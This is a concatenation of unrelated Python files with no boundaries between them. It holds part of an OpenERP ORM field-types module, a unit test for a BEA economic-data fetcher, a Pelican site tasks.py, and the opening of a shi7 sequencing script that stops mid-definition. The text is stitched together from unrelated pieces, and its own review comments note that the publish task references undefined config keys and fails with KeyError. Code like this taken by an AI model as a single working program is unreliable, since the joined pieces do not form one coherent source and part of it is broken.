    _related_sanitize = property(attrgetter('sanitize'))
    _description_sanitize = property(attrgetter('sanitize'))

    _column_strip_style = property(attrgetter('strip_style'))
    _related_strip_style = property(attrgetter('strip_style'))
    _description_strip_style = property(attrgetter('strip_style'))

    def convert_to_cache(self, value, record, validate=True):
        # both None and False denote the absence of a value
        if value is False or value is None:
            return False
        if self.sanitize and validate:
            # clean the markup before it enters the cache
            return html_sanitize(value, strip_style=self.strip_style)
        return value


class Date(Field):
    """ Date field; ORM-level values are strings in ``DATE_FORMAT``. """
    type = 'date'

    @staticmethod
    def today(*args):
        """ Return the current day in the format expected by the ORM.
            This function may be used to compute default values.
        """
        return date.today().strftime(DATE_FORMAT)

    @staticmethod
    def context_today(record, timestamp=None):
        """ Return the current date as seen in the client's timezone, in a
            format fit for date fields.  May be used to compute default
            values.

            :param datetime timestamp: optional datetime value to use instead
                of the current date and time (must be a datetime; plain dates
                cannot be converted between timezones)
            :rtype: str
        """
        today = timestamp or datetime.now()
        context_today = None
        tz_name = record._context.get('tz') or record.env.user.tz
        if tz_name:
            try:
                today_utc = pytz.timezone('UTC').localize(today, is_dst=False)  # UTC = no DST
                context_today = today_utc.astimezone(pytz.timezone(tz_name))
            except Exception:
                _logger.debug("failed to compute context/client-specific today date, using UTC value for `today`",
                              exc_info=True)
        return (context_today or today).strftime(DATE_FORMAT)

    @staticmethod
    def from_string(value):
        """ Convert an ORM ``value`` into a :class:`date` value. """
        if not value:
            return None
        return datetime.strptime(value[:DATE_LENGTH], DATE_FORMAT).date()

    @staticmethod
    def to_string(value):
        """ Convert a :class:`date` value into the format expected by the ORM. """
        if not value:
            return False
        return value.strftime(DATE_FORMAT)

    def convert_to_cache(self, value, record, validate=True):
        if not value:
            return False
        if not isinstance(value, basestring):
            # a date object: serialize it
            return self.to_string(value)
        if validate:
            # force parsing for validation
            self.from_string(value)
        return value[:DATE_LENGTH]

    def convert_to_export(self, value, env):
        if not value:
            return ''
        if env.context.get('export_raw_data'):
            return self.from_string(value)
        return ustr(value)


class Datetime(Field):
    """ Datetime field; ORM-level values are strings in ``DATETIME_FORMAT``. """
    type = 'datetime'

    @staticmethod
    def now(*args):
        """ Return the current day and time in the format expected by the ORM.
            This function may be used to compute default values.
        """
        return datetime.now().strftime(DATETIME_FORMAT)

    @staticmethod
    def context_timestamp(record, timestamp):
        """ Return ``timestamp`` converted to the client's timezone.

            This method is *not* meant for use as a _defaults initializer,
            because datetime fields are automatically converted upon display
            on the client side; for _defaults, :meth:`fields.datetime.now`
            should be used instead.

            :param datetime timestamp: naive datetime value (expressed in UTC)
                to be converted to the client timezone
            :rtype: datetime
            :return: timezone-aware datetime in the context timezone
        """
        assert isinstance(timestamp, datetime), 'Datetime instance expected'
        tz_name = record._context.get('tz') or record.env.user.tz
        utc_timestamp = pytz.utc.localize(timestamp, is_dst=False)  # UTC = no DST
        if tz_name:
            try:
                return utc_timestamp.astimezone(pytz.timezone(tz_name))
            except Exception:
                _logger.debug("failed to compute context/client-specific timestamp, "
                              "using the UTC value",
                              exc_info=True)
        return utc_timestamp

    @staticmethod
    def from_string(value):
        """ Convert an ORM ``value`` into a :class:`datetime` value. """
        if not value:
            return None
        value = value[:DATETIME_LENGTH]
        if len(value) == DATE_LENGTH:
            # a bare date: complete it with midnight
            value += " 00:00:00"
        return datetime.strptime(value, DATETIME_FORMAT)

    @staticmethod
    def to_string(value):
        """ Convert a :class:`datetime` value into the format expected by the ORM. """
        if not value:
            return False
        return value.strftime(DATETIME_FORMAT)

    def convert_to_cache(self, value, record, validate=True):
        if not value:
            return False
        if not isinstance(value, basestring):
            # a datetime object: serialize it
            return self.to_string(value)
        if validate:
            # force parsing for validation
            self.from_string(value)
        value = value[:DATETIME_LENGTH]
        if len(value) == DATE_LENGTH:
            # a bare date: complete it with midnight
            value += " 00:00:00"
        return value

    def convert_to_export(self, value, env):
        if not value:
            return ''
        if env.context.get('export_raw_data'):
            return self.from_string(value)
        return ustr(value)

    def convert_to_display_name(self, value, record=None):
        assert record, 'Record expected'
        # render the timestamp in the client's timezone
        local = Datetime.context_timestamp(record, Datetime.from_string(value))
        return Datetime.to_string(local)


class Binary(Field):
    # binary contents; all caching and conversion behavior is inherited
    # unchanged from Field
    type = 'binary'


class Selection(Field):
    """
    :param selection: specifies the possible values for this field.
        It is given as either a list of pairs (``value``, ``string``), or a
        model method, or a method name.
    :param selection_add: provides an extension of the selection in the case
        of an overridden field. It is a list of pairs (``value``, ``string``).

    The attribute ``selection`` is mandatory except in the case of
    :ref:`related fields <field-related>` or :ref:`field extensions
    <field-incremental-definition>`.
    """
    type = 'selection'
    _slots = {
        'selection': None,              # [(value, string), ...], function or method name
    }

    def __init__(self, selection=None, string=None, **kwargs):
        if callable(selection):
            from openerp import api
            # wrap the callable with api.model (see openerp.api.expected)
            selection = api.expected(api.model, selection)
        super(Selection, self).__init__(selection=selection, string=string, **kwargs)

    def _setup_regular(self, env):
        super(Selection, self)._setup_regular(env)
        assert self.selection is not None, "Field %s without selection" % self

    def _setup_related(self, env):
        super(Selection, self)._setup_related(env)
        # selection must be computed on related field
        field = self.related_field
        self.selection = lambda model: field._description_selection(model.env)

    def set_class_name(self, cls, name):
        """ Determine the effective selection by walking the class MRO and
            applying ``selection`` overrides and ``selection_add`` extensions
            in reverse (base-first) order.
        """
        super(Selection, self).set_class_name(cls, name)
        # determine selection (applying 'selection_add' extensions)
        for field in resolve_all_mro(cls, name, reverse=True):
            if isinstance(field, type(self)):
                # We cannot use field.selection or field.selection_add here
                # because those attributes are overridden by ``set_class_name``.
                if 'selection' in field._attrs:
                    self.selection = field._attrs['selection']
                if 'selection_add' in field._attrs:
                    # use an OrderedDict to update existing values
                    selection_add = field._attrs['selection_add']
                    self.selection = OrderedDict(self.selection + selection_add).items()
            else:
                # a field of another type in the MRO resets the selection
                self.selection = None

    def _description_selection(self, env):
        """ return the selection list (pairs (value, label)); labels are
            translated according to context language
        """
        selection = self.selection
        if isinstance(selection, basestring):
            # a method name: invoke it on the model
            return getattr(env[self.model_name], selection)()
        if callable(selection):
            return selection(env[self.model_name])

        # translate selection labels
        if env.lang:
            name = "%s,%s" % (self.model_name, self.name)
            translate = partial(
                env['ir.translation']._get_source, name, 'selection', env.lang)
            return [(value, translate(label) if label else label) for value, label in selection]
        else:
            return selection

    @property
    def _column_selection(self):
        # old-style columns expect either a list or a function(model, ...)
        if isinstance(self.selection, basestring):
            method = self.selection
            return lambda self, *a, **kw: getattr(self, method)(*a, **kw)
        else:
            return self.selection

    def get_values(self, env):
        """ return a list of the possible values """
        selection = self.selection
        if isinstance(selection, basestring):
            selection = getattr(env[self.model_name], selection)()
        elif callable(selection):
            selection = selection(env[self.model_name])
        return [value for value, _ in selection]

    def convert_to_cache(self, value, record, validate=True):
        if not validate:
            return value or False
        if value in self.get_values(record.env):
            return value
        elif not value:
            return False
        raise ValueError("Wrong value for %s: %r" % (self, value))

    def convert_to_export(self, value, env):
        if not isinstance(self.selection, list):
            # FIXME: this reproduces an existing buggy behavior!
            return value if value else ''
        for item in self._description_selection(env):
            if item[0] == value:
                # export the (possibly translated) label
                return item[1]
        return False


class Reference(Selection):
    """ Selection field whose value refers to an arbitrary record; the
    selection lists the allowed models, and read values have the form
    ``'model,id'``.
    """
    type = 'reference'
    _slots = {
        'size': None,                   # maximum size of values (deprecated)
    }

    _related_size = property(attrgetter('size'))
    _column_size = property(attrgetter('size'))

    def _setup_regular(self, env):
        super(Reference, self)._setup_regular(env)
        assert isinstance(self.size, (NoneType, int)), \
            "Reference field %s with non-integer size %r" % (self, self.size)

    def convert_to_cache(self, value, record, validate=True):
        if isinstance(value, BaseModel):
            # accept a recordset of at most one record, of an allowed model
            model_ok = not validate or value._name in self.get_values(record.env)
            if model_ok and len(value) <= 1:
                return value.with_env(record.env) or False
        elif isinstance(value, basestring):
            # parse a 'model,id' string
            res_model, res_id = value.split(',')
            return record.env[res_model].browse(int(res_id))
        elif not value:
            return False
        raise ValueError("Wrong value for %s: %r" % (self, value))

    def convert_to_read(self, value, use_name_get=True):
        if not value:
            return False
        return "%s,%s" % (value._name, value.id)

    def convert_to_export(self, value, env):
        if not value:
            return ''
        return value.name_get()[0][1]

    def convert_to_display_name(self, value, record=None):
        display = value.display_name if value else value
        return ustr(display)


class _Relational(Field):
    """ Abstract class for relational fields. """
    relational = True
    _slots = {
        'domain': [],                   # domain for searching values
        'context': {},                  # context for searching values
    }

    def _setup_regular(self, env):
        """ Check that ``comodel_name`` is registered; otherwise warn and
            degrade it to the '_unknown' placeholder model.
        """
        super(_Relational, self)._setup_regular(env)
        if self.comodel_name not in env.registry:
            # fix: pass lazy arguments to the logger instead of eagerly
            # %-interpolating the message; formatting now only happens if the
            # record is actually emitted
            _logger.warning("Field %s with unknown comodel_name %r",
                            self, self.comodel_name)
            self.comodel_name = '_unknown'

    @property
    def _related_domain(self):
        if callable(self.domain):
            # will be called with another model than self's
            return lambda recs: self.domain(recs.env[self.model_name])
        else:
            # maybe not correct if domain is a string...
            return self.domain

    _related_context = property(attrgetter('context'))

    _description_relation = property(attrgetter('comodel_name'))
    _description_context = property(attrgetter('context'))

    def _description_domain(self, env):
        # a callable domain is evaluated against the field's model
        return self.domain(env[self.model_name]) if callable(self.domain) else self.domain

    _column_obj = property(attrgetter('comodel_name'))
    _column_domain = property(attrgetter('domain'))
    _column_context = property(attrgetter('context'))

    def null(self, env):
        # the null value of a relational field is an empty recordset
        return env[self.comodel_name]

    def modified(self, records):
        # Invalidate cache for self.inverse_fields, too. Note that recomputation
        # of fields that depend on self.inverse_fields is already covered by the
        # triggers (see above).
        spec = super(_Relational, self).modified(records)
        for invf in self.inverse_fields:
            spec.append((invf, None))
        return spec


class Many2one(_Relational):
    """ Relational field whose cached value is a recordset of size 0 (no
    record) or 1 (a single record).

    :param comodel_name: name of the target model (string)

    :param domain: an optional domain to set on candidate values on the
        client side (domain or string)

    :param context: an optional context to use on the client side when
        handling that field (dictionary)

    :param ondelete: what to do when the referred record is deleted;
        possible values are: ``'set null'``, ``'restrict'``, ``'cascade'``

    :param auto_join: whether JOINs are generated upon search through that
        field (boolean, by default ``False``)

    :param delegate: set it to ``True`` to make fields of the target model
        accessible from the current model (corresponds to ``_inherits``)

    The attribute ``comodel_name`` is mandatory except in the case of related
    fields or field extensions.
    """
    type = 'many2one'
    _slots = {
        'ondelete': 'set null',         # what to do when value is deleted
        'auto_join': False,             # whether joins are generated upon search
        'delegate': False,              # whether self implements delegation
    }

    def __init__(self, comodel_name=None, string=None, **kwargs):
        super(Many2one, self).__init__(comodel_name=comodel_name, string=string, **kwargs)

    def set_class_name(self, cls, name):
        super(Many2one, self).set_class_name(cls, name)
        # a many2one backing an _inherits entry is implicitly a delegation field
        if not self.delegate and name in cls._inherits.values():
            self.delegate = True

    _column_ondelete = property(attrgetter('ondelete'))
    _column_auto_join = property(attrgetter('auto_join'))

    def _update(self, records, value):
        """ Update the cached value of ``self`` for ``records`` with ``value``. """
        records._cache[self] = value

    def convert_to_cache(self, value, record, validate=True):
        if isinstance(value, (NoneType, int, long)):
            # an id (or no id at all): browse it
            return record.env[self.comodel_name].browse(value)
        if isinstance(value, BaseModel):
            if len(value) <= 1 and value._name == self.comodel_name:
                return value.with_env(record.env)
            raise ValueError("Wrong value for %s: %r" % (self, value))
        if isinstance(value, tuple):
            # a pair (id, name): keep only the id
            return record.env[self.comodel_name].browse(value[0])
        if isinstance(value, dict):
            # field values: make a new (draft) record out of them
            return record.env[self.comodel_name].new(value)
        return self.null(record.env)

    def convert_to_read(self, value, use_name_get=True):
        if not (use_name_get and value):
            return value.id
        # evaluate name_get() as superuser, because the visibility of a
        # many2one field value (id and name) depends on the current record's
        # access rights, and not the value's access rights.
        try:
            value_sudo = value.sudo()
            # performance trick: make sure that all records of the same
            # model as value in value.env will be prefetched in value_sudo.env
            value_sudo.env.prefetch[value._name].update(value.env.prefetch[value._name])
            return value_sudo.name_get()[0]
        except MissingError:
            # Should not happen, unless the foreign key is missing.
            return False

    def convert_to_write(self, value, target=None, fnames=None):
        return value.id

    def convert_to_onchange(self, value):
        return value.id

    def convert_to_export(self, value, env):
        if not value:
            return ''
        return value.name_get()[0][1]

    def convert_to_display_name(self, value, record=None):
        return ustr(value.display_name)


class UnionUpdate(SpecialValue):
    """ Placeholder for a pending union; when this value is taken from the
        cache, it evaluates ``record[field.name] | value``, stores the result
        back in the cache, and returns it.
    """
    def __init__(self, field, record, value):
        self.args = (field, record, value)

    def get(self):
        field, record, value = self.args
        # drop self from the cache first, so reading the field below does
        # not come straight back to this placeholder
        del record._cache[field]
        result = record[field.name] | value
        # store the freshly computed union in the cache (cache-only update)
        record._cache[field] = result
        return result


class _RelationalMulti(_Relational):
    """ Abstract class for relational fields *2many. """

    def _update(self, records, value):
        """ Update the cached value of ``self`` for ``records`` with ``value``. """
        for record in records:
            if self in record._cache:
                # cached value present: union it with ``value`` right away
                record._cache[self] = record[self.name] | value
            else:
                # not cached yet: defer the union until the value is fetched
                record._cache[self] = UnionUpdate(self, record, value)

    def convert_to_cache(self, value, record, validate=True):
        """ Normalize ``value`` (recordset, list of ids/commands, or falsy)
            to a recordset of ``comodel_name``. """
        if isinstance(value, BaseModel):
            if value._name == self.comodel_name:
                return value.with_env(record.env)
        elif isinstance(value, list):
            # value is a list of record ids or commands
            comodel = record.env[self.comodel_name]
            ids = OrderedSet(record[self.name].ids)
            # modify ids with the commands (classic x2many write() protocol)
            for command in value:
                if isinstance(command, (tuple, list)):
                    if command[0] == 0:
                        # (0, _, values): create a cache-only record
                        ids.add(comodel.new(command[2]).id)
                    elif command[0] == 1:
                        # (1, id, values): update an existing record
                        comodel.browse(command[1]).update(command[2])
                        ids.add(command[1])
                    elif command[0] == 2:
                        # (2, id): remove and delete
                        # note: the record will be deleted by write()
                        ids.discard(command[1])
                    elif command[0] == 3:
                        # (3, id): remove from the relation only
                        ids.discard(command[1])
                    elif command[0] == 4:
                        # (4, id): add an existing record
                        ids.add(command[1])
                    elif command[0] == 5:
                        # (5,): remove all
                        ids.clear()
                    elif command[0] == 6:
                        # (6, _, ids): replace with the given id list
                        ids = OrderedSet(command[2])
                elif isinstance(command, dict):
                    # bare dict of values: create a cache-only record
                    ids.add(comodel.new(command).id)
                else:
                    # bare id
                    ids.add(command)
            # return result as a recordset
            return comodel.browse(list(ids))
        elif not value:
            return self.null(record.env)
        raise ValueError("Wrong value for %s: %s" % (self, value))

    def convert_to_read(self, value, use_name_get=True):
        # read() returns the list of ids
        return value.ids

    def convert_to_write(self, value, target=None, fnames=None):
        """ Convert ``value`` to a list of x2many commands suitable for
            write(); ``target`` is the record being written (if any). """
        # remove/delete former records
        if target is None:
            set_ids = []
            result = [(6, 0, set_ids)]
            add_existing = lambda id: set_ids.append(id)
        else:
            # one2many deletes removed records (2); many2many unlinks them (3)
            tag = 2 if self.type == 'one2many' else 3
            result = [(tag, record.id) for record in target[self.name] - value]
            add_existing = lambda id: result.append((4, id))

        if fnames is None:
            # take all fields in cache, except the inverses of self
            fnames = set(value._fields) - set(MAGIC_COLUMNS)
            for invf in self.inverse_fields:
                fnames.discard(invf.name)

        # add new and existing records
        for record in value:
            if not record.id:
                # new record: emit a create command with its cached values
                values = {k: v for k, v in record._cache.iteritems() if k in fnames}
                values = record._convert_to_write(values)
                result.append((0, 0, values))
            elif record._is_dirty():
                # modified record: emit an update command with its dirty values
                values = {k: record._cache[k] for k in record._get_dirty() if k in fnames}
                values = record._convert_to_write(values)
                result.append((1, record.id, values))
            else:
                add_existing(record.id)

        return result

    def convert_to_export(self, value, env):
        # comma-separated display names
        return ','.join(name for id, name in value.name_get()) if value else ''

    def convert_to_display_name(self, value, record=None):
        # a *2many value has no single display name
        raise NotImplementedError()

    def _compute_related(self, records):
        """ Compute the related field ``self`` on ``records``. """
        for record in records:
            value = record
            # traverse the intermediate fields, and keep at most one record
            for name in self.related[:-1]:
                value = value[name][:1]
            record[self.name] = value[self.related[-1]]


class One2many(_RelationalMulti):
    """ One2many field; the value of such a field is the recordset of all the
        records in ``comodel_name`` such that the field ``inverse_name`` is equal to
        the current record.

        :param comodel_name: name of the target model (string)

        :param inverse_name: name of the inverse ``Many2one`` field in
            ``comodel_name`` (string)

        :param domain: an optional domain to set on candidate values on the
            client side (domain or string)

        :param context: an optional context to use on the client side when
            handling that field (dictionary)

        :param auto_join: whether JOINs are generated upon search through that
            field (boolean, by default ``False``)

        :param limit: optional limit to use upon read (integer)

        The attributes ``comodel_name`` and ``inverse_name`` are mandatory except in
        the case of related fields or field extensions.
    """
    type = 'one2many'
    _slots = {
        'inverse_name': None,           # name of the inverse field
        'auto_join': False,             # whether joins are generated upon search
        'limit': None,                  # optional limit to use upon read
        'copy': False,                  # o2m are not copied by default
    }

    def __init__(self, comodel_name=None, inverse_name=None, string=None, **kwargs):
        super(One2many, self).__init__(
            comodel_name=comodel_name,
            inverse_name=inverse_name,
            string=string,
            **kwargs
        )

    def _setup_regular(self, env):
        """ Complete the setup of ``self``: hook up the inverse Many2one. """
        super(One2many, self)._setup_regular(env)

        if self.inverse_name:
            # link self to its inverse field and vice-versa
            comodel = env[self.comodel_name]
            invf = comodel._fields[self.inverse_name]
            # In some rare cases, a ``One2many`` field can link to ``Int`` field
            # (res_model/res_id pattern). Only inverse the field if this is
            # a ``Many2one`` field.
            if isinstance(invf, Many2one):
                self.inverse_fields += (invf,)
                invf.inverse_fields += (self,)

    _description_relation_field = property(attrgetter('inverse_name'))

    # attributes exposed to the old-API column counterpart
    _column_fields_id = property(attrgetter('inverse_name'))
    _column_auto_join = property(attrgetter('auto_join'))
    _column_limit = property(attrgetter('limit'))


class Many2many(_RelationalMulti):
    """ Many2many field; the value of such a field is the recordset.

        :param comodel_name: name of the target model (string)

        The attribute ``comodel_name`` is mandatory except in the case of related
        fields or field extensions.

        :param relation: optional name of the table that stores the relation in
            the database (string)

        :param column1: optional name of the column referring to "these" records
            in the table ``relation`` (string)

        :param column2: optional name of the column referring to "those" records
            in the table ``relation`` (string)

        The attributes ``relation``, ``column1`` and ``column2`` are optional. If not
        given, names are automatically generated from model names, provided
        ``model_name`` and ``comodel_name`` are different!

        :param domain: an optional domain to set on candidate values on the
            client side (domain or string)

        :param context: an optional context to use on the client side when
            handling that field (dictionary)

        :param limit: optional limit to use upon read (integer)

    """
    type = 'many2many'
    _slots = {
        'relation': None,               # name of table
        'column1': None,                # column of table referring to model
        'column2': None,                # column of table referring to comodel
        'limit': None,                  # optional limit to use upon read
    }

    def __init__(self, comodel_name=None, relation=None, column1=None, column2=None,
                 string=None, **kwargs):
        super(Many2many, self).__init__(
            comodel_name=comodel_name,
            relation=relation,
            column1=column1,
            column2=column2,
            string=string,
            **kwargs
        )

    def _setup_regular(self, env):
        """ Complete the setup of ``self``: resolve the relation table and
            link up the inverse many2many field, if any. """
        super(Many2many, self)._setup_regular(env)

        if not self.relation and self.store:
            # retrieve self.relation from the corresponding column
            column = self.to_column()
            if isinstance(column, fields.many2many):
                self.relation, self.column1, self.column2 = \
                    column._sql_names(env[self.model_name])

        if self.relation:
            m2m = env.registry._m2m
            # if inverse field has already been setup, it is present in m2m
            # (same table, with the two columns swapped)
            invf = m2m.get((self.relation, self.column2, self.column1))
            if invf:
                self.inverse_fields += (invf,)
                invf.inverse_fields += (self,)
            else:
                # add self in m2m, so that its inverse field can find it
                m2m[(self.relation, self.column1, self.column2)] = self

    # attributes exposed to the old-API column counterpart
    _column_rel = property(attrgetter('relation'))
    _column_id1 = property(attrgetter('column1'))
    _column_id2 = property(attrgetter('column2'))
    _column_limit = property(attrgetter('limit'))


class Serialized(Field):
    """ Minimal support for existing sparse and serialized fields. """
    type = 'serialized'

    def convert_to_cache(self, value, record, validate=True):
        # any falsy value (None, '', {}, ...) is cached as an empty dict
        if value:
            return value
        return {}


class Id(Field):
    """ Special case for field 'id'. """
    type = 'integer'
    _slots = {
        'string': 'ID',
        'store': True,
        'readonly': True,
    }

    def to_column(self):
        """ Return the old-API column object backing this field. """
        self.column = fields.integer(self.string)
        return self.column

    def __get__(self, record, owner):
        if record is None:
            return self         # the field is accessed through the class owner
        if not record:
            # empty recordset: no id
            return False
        # exactly one record expected; return its (possibly virtual) id
        return record.ensure_one()._ids[0]

    def __set__(self, record, value):
        # 'id' is immutable by design
        raise TypeError("field 'id' cannot be assigned")

# imported here to avoid dependency cycle issues
from openerp import SUPERUSER_ID, registry
from .exceptions import Warning, AccessError, MissingError
from .models import BaseModel, MAGIC_COLUMNS
from .osv import fields

# -*- coding: utf-8 -*-

import io
import os

from dlstats.fetchers.bea import BEA as Fetcher

import httpretty

from dlstats.tests.base import RESOURCES_DIR as BASE_RESOURCES_DIR
from dlstats.tests.fetchers.base import BaseFetcherTestCase

import unittest
from unittest import mock

# Directory holding the local BEA test fixtures (zip of the source xls)
RESOURCES_DIR = os.path.abspath(os.path.join(BASE_RESOURCES_DIR, "bea"))

# Expected DSD and series values for dataset "nipa-section1-10101-a"
# (NIPA Table 1.1.1, annual frequency); consumed by FetcherTestCase below.
DATA_BEA_10101_An = {
    "filepath": os.path.abspath(os.path.join(RESOURCES_DIR, "nipa-section1.xls.zip")),
    "DSD": {
        "provider": "BEA",
        "filepath": None,
        "dataset_code": "nipa-section1-10101-a",
        "dsd_id": "nipa-section1-10101-a",
        "is_completed": True,
        "categories_key": "nipa-section1",
        "categories_parents": ["national", "nipa"],
        "categories_root": ["national", "nipa", "nipa-fa2004", "nipa-underlying"],
        "concept_keys": ['concept', 'frequency'],
        "codelist_keys": ['concept', 'frequency'],
        "codelist_count": {
            "concept": 25,
            "frequency": 1
        },        
        "dimension_keys": ['concept', 'frequency'],
        "dimension_count": {
            "concept": 25,
            "frequency": 1
        },
        "attribute_keys": [],
        "attribute_count": None,
    },
    "series_accept": 25,
    "series_reject_frequency": 0,
    "series_reject_empty": 0,
    "series_all_values": 1175,
    "series_key_first": "A191RL1-A",
    "series_key_last": "A191RP1-A",
    # one fully-specified series used as a sample assertion target
    "series_sample": {
        'provider_name': 'BEA',
        'dataset_code': 'nipa-section1-10101-a',
        'key': 'A191RL1-A',
        'name': 'Gross domestic product - Annually',
        'frequency': 'A',
        'last_update': None,
        'first_value': {
            'value': '3.1',
            'period': '1969',
            'attributes': None,
        },
        'last_value': {
            'value': '2.4',
            'period': '2015',
            'attributes': None,
        },
        'dimensions': {
            'concept': 'a191rl1',
            "frequency": 'a'
        },
        'attributes': None,
    }
}

def _get_datasets_settings(self):
    return { 
        "nipa-section1-10101-a": {
            'dataset_code': 'nipa-section1-10101-a',
            'name': 'Table 1.1.1. Percent Change From Preceding Period in Real Gross Domestic Product - Annually',
            'last_update': None,
            'metadata': {
                'filename': 'nipa-section1.xls.zip',
                'sheet_name': '10101 Ann',
                'url': 'http://www.bea.gov/national/nipaweb/GetCSV.asp?GetWhat=SS_Data/Section1All_xls.zip&Section=2'
            },
        }
    }

class FetcherTestCase(BaseFetcherTestCase):
    """End-to-end tests for the dlstats BEA fetcher, driven by the
    DATA_BEA_10101_An fixture and httpretty-mocked downloads."""

    # nosetests -s -v dlstats.tests.fetchers.test_bea:FetcherTestCase
    
    FETCHER_KLASS = Fetcher
    
    # fixture definitions keyed by dataset code
    DATASETS = {
        'nipa-section1-10101-a': DATA_BEA_10101_An
    }
    
    DATASET_FIRST = "nipa-fa2004-section1-101-a"
    DATASET_LAST = "nipa-underlying-section9-90500U-a"
    DEBUG_MODE = False

    def _load_files(self, dataset_code):
        """Register the dataset's source URL so httpretty serves the local zip."""
        url = "http://www.bea.gov/national/nipaweb/GetCSV.asp?GetWhat=SS_Data/Section1All_xls.zip&Section=2"
        self.register_url(url, 
                          self.DATASETS[dataset_code]["filepath"])

    @httpretty.activate
    @unittest.skipUnless('FULL_TEST' in os.environ, "Skip - no full test")
    def test_load_datasets_first(self):

        dataset_code = "nipa-section1-10101-a"
        self._load_files(dataset_code)
        self.assertLoadDatasetsFirst([dataset_code])

    @httpretty.activate     
    @unittest.skipUnless('FULL_TEST' in os.environ, "Skip - no full test")
    def test_load_datasets_update(self):

        dataset_code = "nipa-section1-10101-a"
        self._load_files(dataset_code)
        self.assertLoadDatasetsUpdate([dataset_code])

    #@httpretty.activate
    @unittest.skipIf(True, "TODO")     
    def test_build_data_tree(self):

        dataset_code = "nipa-section1-10101-a"
        self.assertDataTree(dataset_code)
            
    @httpretty.activate
    @mock.patch("dlstats.fetchers.bea.BEA._get_datasets_settings", _get_datasets_settings)     
    def test_upsert_dataset_10101(self):
        """Upsert one dataset and verify codelists, series names and dates."""

        # nosetests -s -v dlstats.tests.fetchers.test_bea:FetcherTestCase.test_upsert_dataset_10101
    
        dataset_code = "nipa-section1-10101-a"
        
        self._load_files(dataset_code)
    
        self.assertProvider()
        dataset = self.assertDataset(dataset_code)

        # expected concept code -> human readable name
        names = {
         'a191rl1': 'Gross domestic product',
         'dpcerl1': 'Personal consumption expenditures',
         'dgdsrl1': 'Personal consumption expenditures - Goods',
         'ddurrl1': 'Personal consumption expenditures - Goods - Durable goods',
         'dndgrl1': 'Personal consumption expenditures - Goods - Nondurable goods',
         'dserrl1': 'Personal consumption expenditures - Services',        
         'a006rl1': 'Gross private domestic investment',
         'a007rl1': 'Gross private domestic investment - Fixed investment',
         'a008rl1': 'Gross private domestic investment - Fixed investment - Nonresidential',
         'y033rl1': 'Gross private domestic investment - Fixed investment - Nonresidential - Equipment',
         'a011rl1': 'Gross private domestic investment - Fixed investment - Residential',
         'a020rl1': 'Net exports of goods and services - Exports',
         'a191rp1': 'Addendum: - Gross domestic product, current dollars'
        }

        for k, v in names.items():
            self.assertTrue(k in dataset["codelists"]["concept"])
            self.assertEquals(dataset["codelists"]["concept"][k], v)
        
        series_list = self.assertSeries(dataset_code)
        series_keys = {s["key"].lower(): s for s in series_list}

        # every concept must yield an annual series with the derived name
        for k, v in names.items():
            search_k = "%s-a" % k
            search_name = "%s - Annually" % v 
            self.assertTrue(search_k in series_keys, "%s not in series_keys" % search_k)
            self.assertEquals(series_keys[search_k]["name"], search_name)
        
        for series in series_list:
            self.assertEquals(series["last_update_ds"], dataset["last_update"])


# -*- coding: utf-8 -*-

import os
import shutil
import sys
import datetime

from invoke import task
from invoke.util import cd
from pelican.server import ComplexHTTPRequestHandler, RootedHTTPServer

# NOTE(review): publish() below formats '{production}:{dest_path}' with
# **CONFIG, but neither key is defined here -- confirm the deployment
# settings before relying on that task.
CONFIG = {
    # Local path configuration (can be absolute or relative to tasks.py)
    'deploy_path': '..',
    # Github Pages configuration
    'github_pages_branch': 'gh-pages',
    'commit_message': "'Publish site on {}'".format(datetime.date.today().isoformat()),
    # Port for `serve`
    'port': 8000,
}

@task
def clean(c):
    """Remove generated files"""
    deploy = CONFIG['deploy_path']
    # nothing to do when the output directory does not exist
    if not os.path.isdir(deploy):
        return
    shutil.rmtree(deploy)
    os.makedirs(deploy)

@task
def build(c):
    """Build local version of site"""
    c.run('pelican -s pelicanconf.py')

@task
def rebuild(c):
    """`build` with the delete switch"""
    # -d clears the output directory before regenerating
    c.run('pelican -d -s pelicanconf.py')

@task
def regenerate(c):
    """Automatically regenerate site upon file modification"""
    # -r keeps pelican running and watching for changes
    c.run('pelican -r -s pelicanconf.py')

@task
def serve(c):
    """Serve site at http://localhost:8000/"""

    # allow quick restarts without waiting for the TIME_WAIT socket to clear
    class AddressReuseTCPServer(RootedHTTPServer):
        allow_reuse_address = True

    server = AddressReuseTCPServer(
        CONFIG['deploy_path'],
        ('', CONFIG['port']),
        ComplexHTTPRequestHandler)

    sys.stderr.write('Serving on port {port} ...\n'.format(**CONFIG))
    # blocks until interrupted
    server.serve_forever()

@task
def reserve(c):
    """`build`, then `serve`"""
    build(c)
    serve(c)

@task
def preview(c):
    """Build production version of site"""
    # publishconf.py holds the production settings (site URL, feeds, ...)
    c.run('pelican -s publishconf.py')


@task
def publish(c):
    """Publish to production via rsync"""
    c.run('pelican -s publishconf.py')
    # NOTE(review): CONFIG defines neither 'production' nor 'dest_path', so
    # this format() call raises KeyError as written -- confirm the intended
    # deployment host/path before using this task.
    c.run(
        'rsync --delete --exclude ".DS_Store" -pthrvz -c '
        '{} {production}:{dest_path}'.format(
            CONFIG['deploy_path'].rstrip('/') + '/',
            **CONFIG))

@task
def gh_pages(c):
    """Publish to GitHub Pages"""
    # build the production site, then push it with ghp-import
    preview(c)
    c.run('ghp-import -b {github_pages_branch} '
          '-m {commit_message} '
          '{deploy_path} -p'.format(**CONFIG))

#!/usr/bin/env python
from __future__ import print_function, division
import multiprocessing
import os
import csv
import datetime
import logging
from datetime import datetime
import argparse
import shutil
import math
from glob import glob
import gzip
from shi7 import __version__

from shi7.shi7 import TRUE_FALSE_DICT, read_fastq, axe_adaptors_single_end, axe_adaptors_paired_end, flash_part1, \
    flash_part2, split_fwd_rev, match_pairs, link_manicured_names

def make_arg_parser():
    """Build the command-line argument parser for shi7_learning."""
    usage = 'shi7_learning v{version}\nshi7_learning.py -i <input> -o <output> ...'.format(version=__version__)
    parser = argparse.ArgumentParser(
        description='This is the commandline interface for shi7_learning',
        usage=usage)
    parser.add_argument('-i', '--input', required=True,
                        help='Set the directory path of the fastq directory OR oligos.txt if splitting')
    parser.add_argument('-o', '--output', default=os.getcwd(),
                        help='Set the directory path of the output (default: cwd)')
    parser.add_argument('--debug', dest='debug', action='store_true',
                        help='Retain all intermediate files (default: Disabled)')
    parser.add_argument('-t', '--threads', default=min(multiprocessing.cpu_count(), 16),
                        help='Set the number of threads (default: %(default)s)')
    parser.add_argument('-v', '--version', action='version', version='%(prog)s ' + __version__)
    parser.set_defaults()
    return parser


def subsample_fastqs(path_fastqs, num_files=10, num_sequences=1000):
